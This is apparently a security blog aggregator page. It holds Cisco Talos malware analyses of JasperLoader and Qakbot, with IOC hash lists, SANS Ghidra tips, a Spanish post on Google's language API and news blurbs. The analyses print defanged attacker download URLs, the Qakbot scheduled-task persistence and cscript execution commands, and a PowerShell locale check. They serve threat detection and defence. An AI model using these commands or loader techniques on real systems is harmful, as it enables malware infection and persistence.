As previously mentioned, the PowerShell executed in Stage 1 is responsible for reaching out to three distinct URLs used to retrieve and execute content on infected systems. The first URL that is defined is: hxxp://cloud[.]diminishedvaluecalifornia[.]com/501?dwgvhgc.

The malware loader initiates an HTTP GET request for contents hosted at the aforementioned URL and returns a numerical value from the attacker-controlled server. Note that the code is present within the Content Body of the HTTP Server Response:
Figure 16: Example HTTP GET request

As defined by the Powershell instructions in Stage 1, the returned content is then saved to %TEMP%\AdobeAR.exe.

In addition to the value "500" that is returned to the client, Talos has also observed additional codes being returned such as "404,""408," etc. In all of the cases Talos observed, the HTTP Response Code remains 200 OK, but the code present in the Content Body varies.

The malware loader also reaches out to the attacker's server at hxxp://cdn[.]zaczvk[.]pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=.

Following an HTTP GET request by the malware loader, the malicious server responds by sending back an HTTP response that contains obfuscated JavaScript:
Figure 17: Stage 2 obfuscated JavaScript

As defined in Stage 1, the contents of the returned JavaScript are saved to the %TEMP%\SearchIE32.js and executed. The contents have been obfuscated to make analysis more difficult. Similar to what was seen with the VBScript obfuscation in the previous stage of the infection, the code defines an array, and then uses push() to create the string of obfuscated data. JavaScript code at the end of the returned content is responsible for reassembling, deobfuscating, and then using eval() to execute the JavaScript.
Figure 18: JavaScript execution functionality

The good news with JavaScript obfuscation is that, typically, the code deobfuscates itself prior to execution. Rather than attempt to manually deobfuscate the JavaScript, we can rely on this behavior to have the code deobfuscate itself automatically. In order to more efficiently deobfuscate and analyze the malicious JavaScript, we can use an analysis tool like Malzilla.
Figure 19: Malzilla decoder tab

Malzilla will deobfuscate the JavaScript and display it in the lower pane. In the case of JasperLoader, this results in another script containing a partially obfuscated set of PowerShell instructions that defines how the malware will continue the infection process.
Figure 20: Malzilla output

The returned script is partially obfuscated using the same method we encountered previously. As we saw before, we simply need to remove the junk strings included throughout the script to fully deobfuscate it. Once those strings are removed, we are left with a script that looks similar to what we saw earlier, with a few changes included:
Figure 21: Stage 2 PowerShell deobfuscated

This script is responsible for performing the retrieval of the commands associated with the next stage of the infection process. It performs the following actions:
  • Calls WScript and uses it to execute PowerShell.
  • PowerShell is used to invoke the Get-UICulture cmdlet to identify the language set used on the system.
    • If the language set is associated with one of the following countries, the infection process terminates:
      • Russia
      • Ukraine
      • Belarus
      • The People's Republic of China
  • Downloads additional data from: hxxp://cdn[.]zaczvk[.]pl/crypt0DD1D2637FDB71097213D70B94E86930.php
    • Saves the downloaded contents to %TEMP%\SearchIE32.txt
    • Reads the contents of the downloaded file and performs a Regex based replacement to deobfuscate it.
    • Executes the deobfuscated code to continue the infection process.
In addition to retrieving the data required to continue the infection process, the script also implements a Sleep cmdlet for 180 seconds then attempts to retrieve the latest obfuscated JavaScript that is hosted at the same URL that was referenced in Stage 1.
Figure 22: Stage 2 — JavaScript retrieval

This JavaScript is then executed again. This is a mechanism that can be used to ensure that as the attackers modify the infection process, they can ensure that any previously infected systems automatically retrieve the modifications and are updated accordingly. This demonstrates an approach that ensures that this loader can be used repeatedly, potentially to deliver different malware payloads over time.

As previously mentioned, the malware makes an HTTP GET request to the following URL to obtain additional instructions from the attacker-controlled server: hxxp://cdn[.]zaczvk[.]pl/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php.
Figure 23: Stage 3 retrieval

The obfuscated data that is returned by the server is then saved to %TEMP%\SearchIE32.txt. The script then reads back the contents of this file and performs a regex replacement operation to deobfuscate it so that it can be executed:
Figure 24: Stage 3 deobfuscation instructions

In order to further analyze the infection process, we need to deobfuscate the contents that were retrieved by the PowerShell. One way is to manually perform the same operation as the PowerShell.

In the previous screenshot, the following line of PowerShell is responsible for deobfuscating the code that was previously retrieved and adding it to the end of a variable assignment, which is later executed:
Figure 25: Stage 3 deobfuscation regex

As the SearchIE32.txt file is read back in, the -replace statement is responsible for removing two of every three characters from the file to deobfuscate and reconstruct the PowerShell commands to be executed. The operation looks like this:

The obfuscated code contains a lot of junk code:

0zig7fs9(y4 7b(i6G7aet5tvf-giUdtIacC4zuxelactd7u6wr53ehy)26.izNejahgm71ewf ga-99mefau6twyctvhu6 6w'cxRf7Ua5|5aUuzAxi|4uBv6Yez|7eCd7N13'v3)66{v4 81eigxjyitct83;3e z4}e0

For every three characters present in the obfuscated code, the first two characters are removed and the remaining character is added to the end of the variable $jwihbyjzvhwwziwzadiuxat

For example, the string:
0zig7fs9(y4 7b(i6G7aet5tvf-giUdtIacC4zuxelactd7u6wr53ehy)26.izNejahgm71ewf ga-99mefau6twyctvhu6 6w'cxRf7Ua5|5aUuzAxi|4uBv6Yez|7eCd7N13'v3)66{v4 81eigxjyitct83;3e z4}e0 
Becomes the PowerShell command:
if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } 

In order to more efficiently deobfuscate the next stage of instructions, we will leverage the PowerShell ISE console to unpack the code for us. We can do this by copying the data retrieved from the server to our system and modifying the same PowerShell commands specified in the aforementioned script:
Figure 26: PowerShell ISE Input

Now that the variable $jwihbyjzvhwwziwzadiuxat contains the deobfuscated code, we can simply retrieve the current value stored in this variable:
Figure 27: Using PowerShell ISE to retrieve code

This causes the PowerShell ISE console to provide the deobfuscated commands that will be used for the next series of operations. We can now retrieve this information and continue our analysis.
Figure 28: PowerShell ISE Stage 3 output

JasperLoader Stage 3


Now that we have obtained the PowerShell responsible for the next stage of the infection process, we can begin to observe the main characteristics of the malware loader itself. Below is the Powershell code associated with this stage of operations.
Figure 29: Stage 3 deobfuscated PowerShell

As can be seen in the screenshot above, this is where the majority of the activity associated with JasperLoader takes place. The PowerShell present in this stage is responsible for the operations described in the following sections.

Geolocation checks


The PowerShell associated with Stage 3 of the JasperLoader infection process performs exactly the same geolocational verification that we have observed in all previous stages of the infection. It checks the UICulture of the system and terminates execution if the UICulture matches Russia, Ukraine, Belarus, or People's Republic of China.
Figure 30: Stage 3 geolocation check

Achieving persistence


The next series of actions are associated with maintaining access to the system. A function called CreateShortcut() is defined that is responsible for achieving persistence by creating a LNK shortcut in the Startup folder of the infected system to ensure that the malware will execute when the system reboots.
Figure 31: Stage 3 persistence mechanism

Bot ID generation


The malware also queries the system using WMI and retrieves various pieces of information that are used to generate a unique identifier for the infected system. This information is later transmitted to the C2 server to register the newly infected system and allow for it to be uniquely identified. These activities are performed by the CreateID() function that is defined, as shown below:
Figure 32: Stage 3 BotID generation

Bot registration and command retrieval


The infected system then uses an HTTP GET request to beacon out to the command and control (C2) server and transmits the unique bot identifier to register the new bot. It also waits for a response from the C2 server to determine how to proceed:
Figure 33: Stage 3 C2 registration

As can be seen in the observed screenshot, the C2 server issues HTTP responses that include pipe-delimited parameters that provide additional commands to JasperLoader and direct it how to proceed.

Supported commands:


JasperLoader currently has support for three distinct commands that may be received from the C2 server during this operation. They are denoted by the first character that is present in the response received from the C2 server. (Such as the letter "d" in the previous screenshot.)

Update mechanism ("u")


The "u" command may be received from the C2 server and directs JasperLoader to attempt to attempt to update itself using the parameters received from the C2 which are handled as values in an array assigned to the variable $action.
Figure 34: Stage 3 update mechanism

Bot management mechanism ("m")


The "m" command provides a mechanism with which the attacker can execute arbitrary system commands using Powershell on infected systems. The loader waits for a response from the C2 server that contains pipe-delimited information. It retrieves PowerShell commands from C2 and passes them to the Invoke-Expression (IEX) PowerShell cmdlet so that they can be executed.
Figure 35: Stage 3 bot management

Download mechanism ("d")


The "d" command directs the infected system to retrieve the final malware payload and provides the parameters with which this operation should take place. It informs JasperLoader where to go to retrieve the final malware payload, where to save it, and where to send status updates following successful deployment of the final payload.
Figure 36: Stage 3 download Function I

Figure 37: Stage 3 download Function II

It also creates a Windows Defender AV exclusion for the directory in which the PE32 will be stored if the system is running PowerShell version 4 or higher.
Figure 38: Stage 3 Windows defender exclusion

The system then attempts to retrieve the PE32 file that is the malicious payload in this particular infection. The screenshot below shows the C2 server delivering the malicious PE32 file to the infected system.
Figure 39: Stage 3 payload delivery

The status of the successful deployment of the malware payload is then further communicated to the attacker's server.
Figure 40: Post-infection status update

In this particular case, the malicious payload being delivered by JasperLoader is a widely distributed banking trojan called "Gootkit." This malware mainly looks to steal users' information and can act as a backdoor to the compromised machine.

Conclusion


JasperLoader is a malware loader that features a multi-stage infection process. This process has been constructed in a way that makes the loader resilient and provides flexibility to adversaries that are attempting to leverage it to spread malware. While it is currently being used to spread the Gootkit banking trojan, it will likely be used to distribute additional malware payloads in the future, as it has been designed in a way that allows the operators of the loader's infrastructure to use it for new payloads in the future as they choose to monetize their operation in different ways. The choice to abuse certified email services such as PEC demonstrates that as attackers are always looking for new ways to lend credibility to their social engineering attacks. In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader. In addition to the various threats that we have already observed abusing these services, we expect additional threats to begin leveraging them as well.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


Indicators of compromise


The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of JasperLoader activity.

Attachment hashes (SHA256)


A list of hashes observed to be associated with malicious email attachments can be found here.

Domains


A list of domains observed to be associated with JasperLoader can be found here.

IP addresses


A list of IP addresses observed to be associated with JasperLoader can be found here.

Wired: Security: Hacktivists Are on the Rise—but Less Effective Than Ever

$
0
0
Groups like Anonymous are still trying to make waves in Sudan and elsewhere, but the old tools don't work as well as they used to.

Cisco Talos: Qakbot levels up with new obfuscation techniques

$
0
0

Ashlee Benge of Cisco Talos and Nick Randolph of the Threat Grid Research and Efficacy team authored this blog post.


Executive summary

Qakbot, also known as Qbot, is a well-documented banking trojan that has been around since 2008. Recent Qakbot campaigns, however, are utilizing an updated persistence mechanism that can make it harder for users to detect and remove the trojan. Qakbot is known to target businesses with the hope of stealing their login credentials and eventually draining their bank accounts. Qakbot has long utilized scheduled tasks to maintain persistence. In this blog post, we will detail an update to these schedule tasks that allows Qakbot to maintain persistence and potentially evade detection.

Infection chain

Victims of this malware are typically infected via a dropper. Once infected, a victim machine will create a scheduled task. This task will execute a JavaScript downloader that makes a request to one of several hijacked domains.

The command line string that create this task is:

C:\Windows\system32\schtasks.exe /create /tn {guid} /tr cmd.exe /C "start /MIN C:\Windows\system32\cscript.exe /E:javascript "C:\Users\USERNAME\ymwoyf.wpl" /sc WEEKLY /D TUE,WED,THU /ST 12:00:00 /F

This downloader is executed using the command:

cmd.exe /C start /MIN C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\\puigje.wpl"
C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\puigje.wpl

Cisco Talos first observed a spike in requests to these hijacked domains on April 2, 2019. This coincides with DNS changes made to these domains on March 19, 2019. Additionally, the comment string "CHANGES 15.03.19" is contained within the malicious JavaScript downloader, suggesting this actor updated the code on March 15. This indicates that these changes to the Qbot persistence mechanism seem to coincide with the launch of a new campaign.


An example downloader with dated comment line.

This downloader always requests the URI "/datacollectionservice[.]php3." from these hijacked domains. The domains used by the downloader for this request are XOR encrypted at the beginning of the JavaScript. The response to this request is obfuscated data that will be saved as (randalpha)_1.zzz and (randalpha)_2.zzz. The first 1,000 bytes of data are saved to the first .zzz file, while the remainder goes to the second file. The data in these files is decrypted with the code contained in the JavaScript downloader.

An example of the JavaScript used to decode the obfuscated .zzz files.

Additionally, a scheduled task is created to execute a batch file.

An example of this batch file.

This code serves to reassemble the malicious Qakbot executable from the two .zzz files, using the type command. The two .zzz files are then deleted after the reassembled executable is run. The functionality of the Qakbot malware remains the same.

Conclusion

There has been a change in the infection chain of Qakbot that makes it more difficult for traditional anti-virus software to detect. This may allow the download of the malware to go undetected, as the malware is obfuscated when it is downloaded and saved in two separate files. These files are then decrypted and reassembled using the type command. Detection that is focused on seeing the full transfer of the malicious executable would likely miss this updated version of Qakbot. Because of this update to persistence mechanisms, the transfer of the malicious Qbot binary will be obfuscated to the point that some security products could miss it.

Coverage

Ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.


Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs


C2 domains observed

lg[.]prodigyprinting[.]com
hp[.]prodigyprinting[.]com
layering[.]wyattspaintbody[.]net
painting[.]duncan-plumbing[.]com

Qakbot hashes

00e4f65b721b334c3aa40e0c0fdc63107965874981fbfef1fc6a3ebb9d6c8d1c
042b8c8ae4525b7fd067c6960def5bb01817bf884db9db0db42c2a3cb10ff327
0633c16d45f6fdc9fd6ba13c86572bfb571e2307ea051e2c119b59458000b51d
0dbf3f0a6a6b77eddd6e63849f2cea98edb855847a51ec313e7b764c5a5a3a59
104d491cd7c6e3f7930edb780bed08fc88012a0f7f77f01ef987f270c9169b49
1430582ad86023fe4b75f4721158ab72c28bef13592ad4462ac30f7b0784cc37
20e53f19fb58b36c93fff100d0e003ff6e88017d6ee6ae8e56d72ba3e1827250
21898a62a58602b67b39ea4c5ce971be4d73c861a1abff22337d2531f7b18d29
2f5b2a72e40226c54871113b18d4e62c76d4cd05eb50a84c02774ed13daee411
33e97cb8c1508b7795748e54634ebcd9b04259f14ef1f5dce32bad765885649a
386796dcf6f731d43182b57dcaf1f7a9db346f84fdde59ea4c40e574983dd4e3
3bd16f8213ff33b7e6ad5ba0974c2674e9a8f5a4b2a914006dbe060cec57d56e
3c5fe3251afef44143b119f6ca45503dda70b51e006b882e9b0666a380c99774
3f1eb5d603074d6d56d99cad4a31fad015e45855e9dbf0ea3ae1969077358a25
42f6a0b64b8dda86c3905a12c3921ead06fa3f24b1231d1bcac7762fb54437d2
45cbe796d27e48e8983eba169a72c5c3da03053ffd9ea519173482bed8af666e
47df7cecfaf49a99c3ac8ebd5b47e4afe46658428dfc4818d7a968e0d84d6e19
482f9255b94f1a7813e3cf631ac4bd14c559694b6162fadc6888a83d5c8f18dd
485dda6eb0574979a04ba831df8ca0588cf034b3005d17153fb56088d31fd487
4ca4665d30d38df77d13ed756d2310faaabc42e3eb3a1b18c26e1698f3e073bd
4efdd3448fbaaa164c0735891512ece65f78d9160ffef0f1983e9539b1c502d7
507d93bc04f4a52e451ec8e212f52397ff25b93e4ea3c9ab54fdd24c2c200171
523789702a134745c78a1430ccc1704650181b2f4f773862d44d45ccf139b93f
52b9d903cf6e578f781af3b1f38263fb2d81282a188e25cacf765d723d3de563
5ac4fbe00b773cbeb52c58234a5d2676f1cf0961385eb6b73934fccdf82a6605
630ba9a1630e90bdbe3d1f63161dc07714818f5b3010f6f9af6e624746529975
6372b115bd5eb33d586519ce478ce161420c53e3d92103f2d8b2bb0e6efedfb8
63cb6cf78b6263ccb6308de73f8084debacf62b88315809473f5b7ffbf9fcbf8
668e1c7275dd3000fd0f24f2a5f9004fc5fd5293c646ad44882122889a99f353
68b9de2981e3d74fbc83b3e26a45eda5611fd1791362d775e12b6db5f1f5f646
6d0f5953b6a2234e00e720b297cdfa12a4d9074a92b85e9e5c508938b5907a0a
6e840301949f41830b927ef569e581d349820387a3ff45a90ef4ec8e4f6f0e86
6f840523ce151950e40e24bfedc27e6ba17a9f65b2a4c3105b543b44e153037d
7086dd6a001e339ae9f789301de2fda398964799094587d55a8860199cdcbcba
72a45d06936294c83c321d4fb312bdaa9b3afdc089975021f4b80d1046f62623
75822e46bf9e827346da33141b8b69bb6210a29f2996d246d565e9567f95e9fe
7758f78992fe71389e36b63d0b22f174d67b8139a80c96df5ebdcef7f1eaa954
7772c892e7a846a7c7d852b73237f2d5e3aea485d423ddccfd7b66262b2a0a7a
77833ef35c69cee4d6c43b13330ef71f08db13290d3d079040ab5d0298a57ccf
78b83e6f1612dd86338faadbccd2b05ecdbcdf221ab694daa6fe1ce0928e2d68
78e917a47f28905498694ec901ae7619c46c71d5f57879ad0a43a451d107b8a1
7e9e493e41fab952e0a5681782a54954447abc3df6ef1d1860e59e586ea6c990
81788d067834ea0298b88cc251ac4b56820bbb85c77345b35886c9af1b139e1c
82bf2bf053fc21efd2b09403bb489d1f32e30ff4523a50963f05394524264ac6
83a60ac3d70283ff82eeacdb500a204170c5ffcc6f59cbc30c0e7a5410ecb293
83c4d91f93f56abf7504faa83a01a84210eb55de991131240a55dd22cb3cb55a
87bf71ceaeacb6a70d86e6ff96ba4e1d2232c2b84242e8cef7ba30b5de47b4a4
89b01325e7a7a8e41d598d07efec7ade3b5da72a97d0a02054c8be8edf41ceb7
8a8e093089e7d144e5cbef20b5010a27da9c29ac0d64a924bb311a3a50ea5b05
8b88a48e14aec83e1c87fe6ca7a66ad718a82276766756f5741fb446bfc0db8f
8bbb44176e94f4e65cc6862e62f3b1544617edc889105e9af07886c0a62942ac
8fa303e89e0f25b4929d3a175c948e3b5a1b257a50911f3eeaaab7f3218077e3
9430fe8f223db4b551ed77e61ac6d38efee348940018ae9e1c15827f53cc618d
9548afeb0037077a1e98feabe952472b6882eccd4c8ef6e1d3a93370198fa6a5
99005c7ebde6c9d72e84fbf246c7b8aacc8e3c39132834b846a5ed4d49b1dcd5
9926bc84e414ad65947461955bf043fe1dd11358f5d517785f6d0571b9acf548
996ebea3b2e4b269cc10051f8a5d90cb0e68dee16a6000ff35bac85cb17024d4
9f2bf3c3efdd1e388f87a64bac0bfc4b756cc923b428e85ef9e67a86f79c0bc7
a0ea5b224ee2a85334cf434805edb9dd57b100975fd3c0a564b03d28a5203ee2
a4416996ae9e25b496a343f5a94366ea33ac8797eccd289a83402978b03d371f
aa11c00bc40f9bea2aff915d9cbf89e067aabdf764e52d664e7337545ffca04b
abdcb3156ed4bcc5bce29f621ee8593fec625f74b3d1580cd1aa6e7557f822cf
bd1190f7470b3219446024c9b85d1533d5ba56d24bcc618adfb05333c350ec8b
bddac88644d3e23abba825283df777b76676b5348fd7225aa3dc3ead39ff7201
bef299f5cff4b601adc6c8cde21d22465d19846f2f97d81fa8ea2439a4867864
c075b937f4ad0b6077253ad1ebc8cf531c6f1ba167f90cd6ed77fc7a44684340
c4f10d10da4598d970ada132f7a476f74902143567d45afd4858d4d9fa7210af
c6edaa1e6125faddacb34f5f567cbb78abb1c138f970d914b95fdd4499052aa0
c6ef40e940c92b8399792521eb677f5238e21ecf99834826990153efa41064ba
c77ed215f5ca3eb4b5ab6926b32392c4d58bcaaa9ad1d585632372e7f059360f
c97049d43b38577c01ef508c6ba5f6d15a3002728e5896b5d4982ee206a12a8b
cd00617dd8eac1a70bff92d029861487197eb486deb0c4c66542af50309bc535
cd9d8c6c3bc14559d5da15887c5c12be6ac6241b9c36d1fcc0063ad489d14bb5
cdac2ca810ed43d4bd9bf7ade4b0a8dbc26fbeed3f11eee1aa5cb8334b6d6105
d8b5067443c940864e972369e259a0826bb3774487c8605d6e5e870510d41504
da823b80766ffc75ed32751ea6ded68e132976d28416fb78bddccd489372f069
e30ddbd161e44cf7823b1850604d1cf87d4b9c9af8d0407bde05e7bb758a0559
e3f9e76406739c68be2cd6a228131a63662e16fcf757c6251f5e4d0905ab3cd0
e8f943454ab41dbd019434e0716d923fb87547cf73306b164ada93612d5f263f
e8fff8ac794b44fade6bdf14f08104012bafff894e44003b84808a5bfd2cebbb
e946b516013cb6cff31e21ee2ccabd1b8ce1e5ed5a4f9e36ffad07c4d880e417
edf907d35b16877a6ff344bdb62852f0f1c418bc4f83072b518204e398e61365
f9969aaab5276399d486a0619840e41e63340c1106f1e2652eb098052d8a2241
fa3bc57c23c5f60050d5b6673681d8bc170d5c9417cfc4c231d3794800400315
fe294978397abe1f23b88e47a94d516c977cd0c9cb368bcdc20f5f3899daf6bd

Javascript hashes

dd8c25c7483acb627935b3ec6de505aa7fdf95ee4db8108b89d0deb57510217c
581fe44b3da62d2155452beeda2f20f63fa042271a97cd8e016b4f6f6f8b575f
37f2b74550724859eb8b30fd60d8580c0e4eb6dc64d5d55e46774967fb0b9719
9a849f42734c1bad3fa3c3b5cb5d8781c21e6241f8977636774384e6177756f2
88b780e35400a63e5f2526e67287508865801f4c176b449c9bd9897a6f4d099e
b853bf59cbfa95d5c76c76b5cf583d867929ffd164e248e33f55929ce0f65456
84defbc371379f548cbfc7837128f33c35a2a95835d93e287c6c2f7f8428d910
fa209beccf0fe4883b900462ecdf25f7a405adc962f393e116a556f4018773a3
f7ea4652a096c007a233fb588d7a1b129a1b68829f78d58bb67b33c3582f032d
16ea880880c3466e3ff95bc3df309242861b0d43600862b0e9f563bda90d00d3
11447fbf6b64d137ab09ae7c861719169650a06ccc44abf0bcbbac8f5830343b
e57062a03e0397ba7b5edba76b92f6e00e00a3f5f3126335a152803ba9dea5a9
f3667a47b00bd70f06cefa19de31ccd818095638059f2fe237096741c6b47863
86e07fcea780307b1ef2151b19a41170262947193b7b5b8998203ee0bb648c14
d0fefd2af365336288bc8d7c9bb3d840e483cccf8c2afe493e3dc71e402a78c8
3876816f0cc13e72c2ed64e857090c6a78106b9accc5f8d8fd90652a293890be
170f58ca16e031ce31d117ba36a525189cfe4a08fece3fe1d65f18d293e2c7fe
e64d432aac6c9209d84b9e9b9b77bae4148dba91f49e2871c6a14a2d0777e8e0
8041bc11d40ef808f9a25a5b3d2104aa67e6ba5a696d1bd352ccdf8b3039df9b
1333715b86d4009eb40b92675ed494dda786c275ccdcd59644ea3b0408df3d08
59dbf5984c48109a16de20656a3305269f4afa66e8864276e69d900d6cfe92c0
5468b140b70a7c6566cc7bc60e11e32d0165015df59fc448588fa9f7c68a5c94
82a13c434e21f40bf5f1e7e2694784e2152834c3c5e7188026efd4d698d63d8d
2ce2651e7ea2ece2b45cadbf7ef916a998d14bbf3830631cf1de6c4c28a97d80
ce65b98b78ee749c5db5cb678cb6a8f21f568446a9e7433f6cb3c2d648602512
b76cc76001cb245697bab1d14b0b0a9c85dc0a034d70f70cc7b4a207124b932f
c9ce209cbc4d3a733ed2dc6ff65318ab0d49506a9b406e8c11805b762c80d2b0

BreakingPoint Labs Blog: What to do when traffic overwhelms your monitoring tools

$
0
0
Growing traffic volume is a challenge for NetOps and SecOps as they work to ensure high-quality…

SANS Internet Storm Center, InfoCON: green: ISC Stormcast For Friday, May 3rd 2019 https://isc.sans.edu/podcastdetail.html?id=6482, (Fri, May 3rd)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: A few Ghidra tips for IDA users, part 3 - conversion, labels, and comments, (Fri, May 3rd)

$
0
0

In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.

The first one is simple conversion. In this case, hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but that is currently taken by View/Edit References From. You can change that or create your own key mapping, Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.

Another of the features I use regularly, is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key, in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.

And below is the actual dialog to do the renaming.

And, the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments that you can create with Ghidra. Pre-comments which will appear above the instruction where you place it, post-comments which appear below, EOL (and repeatable) comments at the end of the line, and Plate comments, which change the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment which can be used to fill in info on what I've discovered about the functionality of the function in question.

And here are examples of each

I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc. let me know via our contact page, e-mail, or via the comments below. Until next time,...

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Un informático en el lado del mal: Google Cloud Natural Language Analysis API: Un ejemplo con Chuck Norris, "hacker" y el estrangulamiento de Chema Alonso.

$
0
0
Hace unos días estuve probando los servicios de Visión Artificial en Microsoft Azure para el reconocimiento de Celebrities, y un poco más aún, cómo funcionaban algunos servicios de Sentiment Análisis en textos en lenguaje natural. Los dos servicios tenían algo de controversia para mí, el primero porque asusta que un sistema de visión artificial reconozca también a las personas en fotografías, el segundo por cómo están entrenando a la AI para reconocer correcta - o incorrectamente - el sentimiento de una frase.

Figura 1: Google Cloud Natural Language Analysis API: Un ejemplo
con Chuck Norris, "hacker" y el estrangulamiento de Chema Alonso.

Ayer, aprovechando que tenía el día de fiesta, quise echarle un ojo a la API de Google Cloud para el Análisis de Lenguaje Natural, que entre otras cosas tiene un Análisis de Sentimiento. Bueno, al menos en algún idioma, porque el Español no está por ahora - supongo que estará en breve, pero por ahora solo podemos probar con la lenguaje de la Gran Bretaña.

Puse varios textos, y aunque es verdad que en Visión Artificial no tiene "Celebrities" - aún - en el caso del texto sí que busca los nombres de personas que son citadas en él dentro de la Wikipedia. Ya que no reconoce Celebrities en fotos, decidí contar lo que se veía en la foto en la que estoy con el gran Chuck Norris. Y aunque no tiene el servicio citado,  sí que en la frase reconoce a Chuck Norris, y me reconoce a mí. Y lo hace enlazando las páginas de la Wikipedia en Inglés para Chuck, y Wikipedia en Español para mí, lo que está bien porque busca en todo el Wiki-mundo.

Figura 3: Análisis de Entidades en Google Cloud NLP API

En cuanto a la parte de importancia (Salience) en la frase. Chuck queda muy por encima de mí - algo normal teniendo en cuenta que nadie somos dignos de él. Pero no, no es por la importancia de la persona, sino por el protagonismo en la frase. Al ser el sujeto le da más importancia. La misma frase, pero cambiando la enunciación a una frase en pasiva, el resultado cambia completamente.

Figura 4: Mimas entidades, cambian el Salience de cada una. 

Si miramos la parte de Análisis de Sentimiento vemos cosas curiosas. La primera que considera que la frase tiene un sentimiento Negativo, un -0.4 cuando el máximo es -0.5. Vamos, no Negativo, sino MUY Negativo. En eso estoy de acuerdo, ya que cualquier frase,  sea en activa, pasiva o reflexiva, que termine con Chema Alonso estrangulado - sea el idioma que sea - es malo. Muy malo, remarco.

Figura 5: Análisis de Entidades en Google Cloud NLP API

Probando ya palabras concretas, como el caso de "Hacker", se puede comprobar que el termino es neutral si va aislado. Pero que si ponemos adjetivos como Big, Great o en incluso "Old", el termino tiende a hacerse negativo con facilidad. Qué le vamos a hacer.

Figura 6: El termino "hacker" aislado es neutro

En la Figura 6 se ve que aislado es neutro, pero si ponemos "Big" Hacker el sentimiento se va a -0.5, lo que es muy, muy, muy negativo. El Análisis de Sentimiento de esta última parte de mi texto debería ser igual, MUY Negativo.

Figura 7: Análisis de Sentimiento MUY Negativo

El servicio también hace un Análisis Sintáctico de forma gratuita que seguro que hace felices a muchos niños estudiando Lengua y teniendo que resolver las estructuras sintácticas de las oraciones - que recuerdos de mis años mozos en C.O.U.  -.

Figura 8: Análisis Sintáctico de una frase con Google Cloud NLP API

Y poco más. Como podéis ver, estas tecnologías que utilizan Inteligencia Artificial para crear sistemas Cognitivos - o Cognitive Intelligences como nuestra querida AURA - están en pleno crecimiento y tomando decisiones muy aceleradas. Algunas con sesgos, otras con malas interpretaciones semánticas, otras con malas interpretaciones en sentimiento, e incluso con desconocimiento de muchos términos, por lo que creo que debemos prestar atención a lo que está sucediendo en este mundo.


Figura 9: Conferencia de Chema Alonso en VIII CILE (Córdoba, Argentina)

Os dejo la conferencia que di sobre este tema en el VIII Congreso Internacional de la Lengua Española en Córdoba (Argentina) para que veáis algunos ejemplos de lo que decía. En este caso concreto del artículo de hoy, podéis probar la API de Google Cloud NLP vosotros mismos, y estaré encantado de que compartáis conmigo todo lo que vayáis descubriendo que pueda ser interesante.

Saludos Malignos!

Wired: Security: A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree

$
0
0
A group of likely Chinese hackers has poisoned the software of at least six companies in just the last three years.

Cisco Talos: Threat Roundup for April 26 to May 3

$
0
0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 26 and May 03. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

